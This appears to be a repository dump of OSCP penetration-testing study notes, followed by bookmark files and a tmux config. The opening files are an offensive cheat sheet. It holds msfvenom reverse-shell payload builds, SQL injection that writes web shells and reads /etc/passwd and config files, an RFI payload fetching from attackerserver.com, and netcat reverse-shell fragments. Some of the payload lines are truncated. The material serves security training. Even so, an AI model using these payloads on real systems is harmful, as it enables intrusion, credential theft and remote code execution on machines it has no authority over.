----------------------------------------------------- 3 | 4 | PHP 5 | 6 | 7 | 8 | ----------------------------------------------------- 9 | Reverse Shell 10 | 11 | http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 12 | 13 | ----------------------------------------------------- 14 | 15 | Msfvenom 16 | #Linux 17 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -f elf > shell.elf 18 | # PHP 19 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT=443 -f raw > shell.php 20 | # ASP 21 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f asp > shell.asp 22 | # WAR 23 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f war > shell.war 24 | # JSP 25 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=443 -f raw > shell.jsp 26 | # Exe 27 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=445 -f exe -o shell_reverse.exe 28 | 29 | ----------------------------------------------------- 30 | 31 | Interactive TTY Shell 32 | # python 33 | python -c 'import pty; pty.spawn("/bin/sh")' 34 | # Echo 35 | echo 'os.system('/bin/bash')' 36 | # sh 37 | /bin/sh -i 38 | # bash 39 | /bin/bash -i 40 | 41 | ----------------------------------------------------- 42 | 43 | Shell From SQL Injection 44 | # windows 45 | ?id=1 union all select 1,2,3,4,"",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php' 46 | # linux 47 | ?id=1 union all select 1,2,3,4,"",6,7,8,9 into OUTFILE '/var/www/html/cmd.php' 48 | -------------------------------------------------------------------------------- /Web: -------------------------------------------------------------------------------- 1 | HTTP Enumeration 2 | ---------------------------------------------- 3 | # Gobuster 4 | gobuster -u -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e 5 | ---------------------------------------------- 6 | # nikto 7 | nıkto -h 8 | ---------------------------------------------- 9 | # curl 10 | curl -v -X OPTIONS http:///test/ 11 | curl --upload-file -v --url -0 --http1.0 12 | ---------------------------------------------- 13 | # LFI 14 | # PHP Wrapper 15 | php://filter/convert.base64-encode/resource=index.php 16 | # Null Byte 17 | ?page=../../../../../../etc/passwd%00 18 | ---------------------------------------------- 19 | 20 | # RFI 21 | ?page=http://attackerserver.com/evil.txt 22 | 23 | ---------------------------------------------- 24 | # Command Execution 25 | 26 | &1|nc 1234 >/tmp/f');?> 27 | 28 | --------------------------------------------- 29 | 30 | # LFI and RCE 31 | 32 | # Inject code execution 33 | 34 | 35 | # Go to LFI vuln and 36 | ?=…….&cmd=ls 37 | 38 | 39 | ---------------------------------------------- 40 | # SQL Injection (manual) 41 | photoalbum.php?id=1' 42 | 43 | # find the number of columns 44 | photoalbum.php?id=1 order by 8 45 | 46 | # Find space to output db 47 | ?id=1 union select 1,2,3,4,5,6,7,8 48 | 49 | # Get username of the sql-user 50 | ?id=1 union select 1,2,3,4,user(),6,7,8 51 | 52 | # Get version 53 | ?id=1 union select 1,2,3,4,version(),6,7,8 54 | 55 | # Get all tables 56 | ?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables 57 | 58 | # Get all columns from a specific table 59 | ?id=1 union select 1,2,3, column_name ,5,6,7,8 from information_schema.columns where table_name=‘users’ 60 | ?id=1 union select 1,2,3, group_concat(column_name) ,5,6,7,8 from information_schema.columns() where table_name=‘users’ 61 | .. 1,2,3, group_concat(user_id, 0x3a, first_name, 0x3a, last_name, 0x3a, email, 0x3a, pass, 0x3a, user_level) ,5,6,7,8 from users 62 | 63 | # view files 64 | ' union select 1,2,3, load_file(‘/etc/passwd’) ,5,6,7,8 -- - 65 | ' union select 1,2,3, load_file(‘/var/www/login.php’) ,5,6,7,8 -- - 66 | ' union select 1,2,3, load_file(‘/var/www/includes/config.inc.php’) ,5,6,7,8 -- - 67 | ' union select 1,2,3, load_file(‘/var/www/mysqli_connect.php’) ,5,6,7,8 -- - 68 | 69 | # upload files 70 | ' union select 1,2,3, 'this is a test message' ,5,6,7,8 into outfile '/var/www/test'-- - 71 | ' union select 1,2,3, load_file('/var/www/test') ,5,6,7,8 -- - 72 | ' union select null,null,null, "" ,5,6,7,8 into outfile '/var/www/shell.php' -- - 73 | ' union select null,null,null, load_file('/var/www/shell.php') ,5,6,7,8 -- - 74 | 75 | ---------------------------------------------- 76 | 77 | # wordpress 78 | wpscan --url http://.... --log 79 | wpscan --url http://... --enumerate u --log 80 | wpscan --url http:// --wordlist wordlist.txt --username example_username 81 | http://....../wp-admin 82 | http://...../wp-content/uploads/2017/10/file.png 83 | 84 | ---------------------------------------------- 85 | #Windows Command Execution (RFI exploit) 86 | 87 | #Connect via netcat to victim (nc -nv <[IP]> <[PORT]>) and send 88 | 89 | # on kali call the shell 90 | nc -nv 10.11.25.59 4444 91 | 92 | 93 | -------------------------------------------------------------------------------- /Websites/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/executeatwill/OSCP-Treasure-Cave/c3e706a3527d1887b4f8462932e4372bab06d418/Websites/.DS_Store -------------------------------------------------------------------------------- /Websites/Basic Linux Privilege Escalation.webloc: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | URL 6 | https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ 7 | 8 | 9 | -------------------------------------------------------------------------------- /Websites/Manifesto - ScriptDotSh.webloc: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | URL 6 | https://scriptdotsh.com/ 7 | 8 | 9 | -------------------------------------------------------------------------------- /Websites/OSCP & Cyber Stuff - Dropbox.webloc: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | URL 6 | https://www.dropbox.com/sh/ba0t59c5fnccgms/AACvUbUSflWB1_AAgj8okEUra?dl=0&lst= 7 | 8 | 9 | -------------------------------------------------------------------------------- /Websites/Offensive Security Student Support.webloc: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | URL 6 | https://support.offensive-security.com/#!oscp-exam-guide.md 7 | 8 | 9 | -------------------------------------------------------------------------------- /Websites/PGP Decrypt, Remove whitespace - CyberChef.webloc: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | URL 6 | https://gchq.github.io/CyberChef/#recipe=PGP_Decrypt('',''/disabled)Remove_whitespace(true,true,true,true,true,false/disabled) 7 | 8 | 9 | -------------------------------------------------------------------------------- /Websites/SU-Courses:CIS643-ComputerSecutiry:References at master · Ider:SU-Courses.webloc: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | URL 6 | https://github.com/Ider/SU-Courses/tree/master/CIS643-ComputerSecutiry/References 7 | 8 | 9 | -------------------------------------------------------------------------------- /Websites/Welcome [Root Me - Hacking and Information Security learning platform].webloc: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | URL 6 | https://www.root-me.org/?lang=en 7 | 8 | 9 | -------------------------------------------------------------------------------- /Websites/netsecstudents- Subreddit for students studying Network Security and its related subjects.webloc: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | URL 6 | https://www.reddit.com/r/netsecstudents/ 7 | 8 | 9 | -------------------------------------------------------------------------------- /eBooks-Links/Introduction · Security - My notepad.webloc: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | URL 6 | https://xapax.gitbooks.io/security/content/ 7 | 8 | 9 | -------------------------------------------------------------------------------- /eBooks-Links/OWASP Testing Guide.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/executeatwill/OSCP-Treasure-Cave/c3e706a3527d1887b4f8462932e4372bab06d418/eBooks-Links/OWASP Testing Guide.pdf -------------------------------------------------------------------------------- /tmux/How do I scroll in tmux? - Super User.webloc: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | URL 6 | https://superuser.com/questions/209437/how-do-i-scroll-in-tmux 7 | 8 | 9 | -------------------------------------------------------------------------------- /tmux/tmux copy paste with mouse | Awhan Patnaik.webloc: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | URL 6 | https://awhan.wordpress.com/2012/04/18/tmux-copy-paste-with-mouse/ 7 | 8 | 9 | -------------------------------------------------------------------------------- /tmux/tmux shortcuts & cheatsheet · GitHub.webloc: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | URL 6 | https://gist.github.com/MohamedAlaa/2961058 7 | 8 | 9 | -------------------------------------------------------------------------------- /tmux/tmux.conf: -------------------------------------------------------------------------------- 1 | # execatwill tmux config 2 | # Few tweaks to configuration file 3 | # to use copy to ~/.tmux.conf 4 | 5 | # remap prefix from 'C-b' to 'C-a' 6 | unbind C-b 7 | set-option -g prefix C-a 8 | bind-key C-a send-prefix 9 | 10 | # Sane scrolling 11 | set -g terminal-overrides 'xterm*:smcup@:rmcup@' 12 | 13 | # Quality of life stuff 14 | set -g history-limit 10000 15 | set -g allow-rename off 16 | 17 | # Search Mode VI 18 | set-window-option -g mode-keys vi 19 | 20 | # Save pane log with Prefix + alt + shift +p 21 | run-shell /opt/tmux-logging/logging.tmux 22 | 23 | # from hamvoke guide to customizing you tmux 24 | # Enable mouse mode (tmux 2.1 and above) 25 | set -g mouse on 26 | 27 | 28 | # from github greatest tmux config 29 | # 0 is too far from ` ;) 30 | set -g base-index 1 31 | 32 | #set -g default-terminal screen-256color 33 | set -g status-keys vi 34 | set -g history-limit 10000 35 | 36 | setw -g mode-keys vi 37 | setw -g monitor-activity on 38 | 39 | bind-key v split-window -h 40 | bind-key s split-window -v 41 | 42 | bind-key J resize-pane -D 5 43 | bind-key K resize-pane -U 5 44 | bind-key H resize-pane -L 5 45 | bind-key L resize-pane -R 5 46 | 47 | bind-key M-j resize-pane -D 48 | bind-key M-k resize-pane -U 49 | bind-key M-h resize-pane -L 50 | bind-key M-l resize-pane -R 51 | 52 | # Vim style pane selection 53 | bind h select-pane -L 54 | bind j select-pane -D 55 | bind k select-pane -U 56 | bind l select-pane -R 57 | 58 | # Use Alt-vim keys without prefix key to switch panes 59 | bind -n M-h select-pane -L 60 | bind -n M-j select-pane -D 61 | bind -n M-k select-pane -U 62 | bind -n M-l select-pane -R 63 | 64 | # Use Alt-arrow keys without prefix key to switch panes 65 | bind -n M-Left select-pane -L 66 | bind -n M-Right select-pane -R 67 | bind -n M-Up select-pane -U 68 | bind -n M-Down select-pane -D 69 | 70 | # Shift arrow to switch windows 71 | bind -n S-Left previous-window 72 | bind -n S-Right next-window 73 | 74 | # No delay for escape key press 75 | set -sg escape-time 0 76 | 77 | # Reload tmux config 78 | bind r source-file ~/.tmux.conf 79 | 80 | # THEME 81 | set -g status-bg black 82 | set -g status-fg white 83 | set -g window-status-current-bg white 84 | set -g window-status-current-fg black 85 | set -g window-status-current-attr bold 86 | set -g status-interval 60 87 | set -g status-left-length 30 88 | set -g status-left '#[fg=green](#S) #(whoami)' 89 | set -g status-right '#[fg=yellow]#(cut -d " " -f 1-3 /proc/loadavg)#[default] #[fg=white]%H:%M#[default]' 90 | --------------------------------------------------------------------------------